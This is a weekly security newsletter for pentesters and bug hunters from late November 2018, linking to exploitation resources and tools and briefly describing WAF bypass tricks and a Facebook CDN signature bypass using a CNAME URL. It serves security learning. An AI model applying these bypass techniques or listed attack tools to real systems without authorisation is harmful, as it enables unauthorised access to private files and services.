Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from 23 to 30 of November.
Our favorite 5 hacking items
1. Resource of the week
This is a cheat sheet of techniques for bypassing Web Application Firewalls. It might be useful and help you find bugs that others have missed.
Some of the techniques using double Host headers or double Content-Type headers, entering the HTTP method in lowercase or including tabs, etc.
2. Writeup of the week
I love how simple yet creative this finding is!
Facebook and Instagram store photos/videos on their CDN subdomains *.fbcdn.net. These URLs can’t be accessed directly without any parameters (“Access denied” error). And hashes sent as GET parameters protect from request tampering (for e.g. modifying file extensions).
A workaround to bypass all these checks is to access the same files through the subdomain’s CNAME record, https://scontent.xx.fbcdn.net/t51.2885-15/12494762_1700832180174667_9131300789175210564_n.html:
instagram.fpnq2-1.fna.fbcdn.net. 3599 IN CNAME scontent.xx.fbcdn.net.
This allows access to any file while bypassing signature checks and without specifying any parameters. Even expired links are accessible!
3. Tool of the week
Broken Link Hijacking Burp Extension is a very nice addition to any bug hunter’s arsenal.
Every time a broken link is detected while you’re testing a target, it is reported as an issue. Then you can test all links for link hijacking, as explained in “Broken Link Hijacking - How expired links can be exploited.” by @EdOverflow.
4. Article of the week
Wide use of HTTPS makes Man-in-The-Middle attacks harder to perform today. But they are still possible, as HTTPS can be bypassed if CORS, postMessage, HSTS and WebSockets are not used properly.
This article gives examples of what can go wrong and how HTTPS can be bypassed.
5. Tutorial of the week
I always forget tcpdump and wireshark filters and syntax. So this list of 50 tcpdump recipes is very handy.
It includes things like: how to display only IPv6 traffic, how to filter traffic by IP, port, protocol or network, how to find HTTP hosts, cookies, user agents, cleartext passwords & more.
Other amazing things we stumbled upon this week
- Why Do Bug Bounty Hunters Do What They Do? We Asked Them.
- Darknet Diaries Ep 27: Chartbreakers
- The History of OWASP (S04E18)
- Unusual Gathering Podcast featuring Casey Ellis and Liz Wharton
- ZeroDayLive Episode 1- PhotoBox- When Stu Met Stuart
- Are Third-Party Vendors Your Biggest Cybersecurity Risk? — CyberSpeak Podcast
- Cybersecurity: Kerckhoffs’ Principle & why attack is the best form of defence
- 13 Life as an iOS Attacker (TenSec 2018)
Medium to advanced
- Escalating SSRF in a Vulnerable Jira Instance to RCE via Docker Engine API
- Impersonating users by abusing broken “Sign in with” implementations
- Fragmented SQL Injection Attacks – The Solution
- Learn vim For the Last Time
- Metasploit Basics, Part 21: Post Exploitation with mimikatz
- JAVA RMI (Remote Method Invocation) Exploitation with Metasploit Framework
- Cracking linux full disc encryption, luks with hashcat
- How to hunt insecure CORS…
- CORS attacks
- BBN challenge resolutions: “A properly secured parameter” and “Exploiting a static page”
- NodeJS SSRF by Response Splitting — ASIS CTF Finals 2018 — Proxy-Proxy Question Walkthrough
- Android Hook by Frida— ASIS CTF Final 2018 — Gunshop Questions Walkthrough
- PLC Bug Hunt
Pentest & Responsible disclosure writeups
Bug bounty writeups
- Stored XSS on HackerOne ($2,500)
- SQL injection on HackerOne
- Insufficient Session Expiration on HackerOne ($500)
- 2FA bypass on Instagram
- Logic flaw on Facebook ($750)
See more writeups on The list of bug bounty writeups.
If you don’t have time
- brute-sqlcipher: Bash script for brute-forcing encrypted sqlite databases (on mobile devices for example)
- weirdAAL: WeirdAAL (AWS Attack Library) & AWS EC2 instance userData
- EyeWitness updated: Get screenshots of websites and server header info, identify default credentials if possible. What’s new:
EyeWitness no longer has the “—headless”, it now only has “—web” for web screenshots. This uses Firefox in the backend and runs it headlessly, so this will still work on a headless server!
More tools, if you have time
- Infection Monkey: Automated pentest tool / Open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement.
- XSShell: An XSS reverse shell framework in GO
- Shellver: Reverse Shell Cheat Sheet Tool
- CCAT (Cisco Config Analysis Tool): Tool which analyzes the configuration files of Cisco devices based on the Cisco Guide to Harden Cisco IOS Devices
Misc. pentest & bug bounty resources
- PHP Security Advent Calendar 2018
- fuzz.txt: Potentially dangerous files
- cloud_metadata.txt: Cloud Metadata Dictionary useful for SSRF Testing
- hak.lnk: Project “hak.lnk” - Resource Links For Hackers
- Free, online & interactive @teamKatacoda course on monitor mode, WPA cracking & tshark
- Reddit r/InfoSecInsiders
- List of Google Advanced Search Engine Queries/Dorks
- The Difference Between URLs and URIs
- Top 30 Penetration Tester (Pentester) Interview Questions and Answers for 2019
- Introducing Hacker Dashboard: Your personalized HackerOne overview: A personalized overview of your accepted & pending invitations for private programs, plus a feature to bookmark your favorite programs
- The Writable Files API: Simplifying local file access: Allows users to choose files or directories that a web app can interact with on the native file system
- Open Source: It’s turtles all the way down.: A hacker managed to become administrator of an open source NodeJS package by befriending its original developer, then injected malware to steal Bitcoin
- How to balance full-time work with creative projects
- Let’s talk 22nd century: human hacking & cloud security
Tweeted this week
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 11/23/2018 to 11/30/2018
Have a nice week folks!
If you want to be notified when new articles (including this newsletter) are published, you can subscribe to this blog.
And if you enjoyed reading this, please consider sharing it, leaving a comment, suggestions, questions…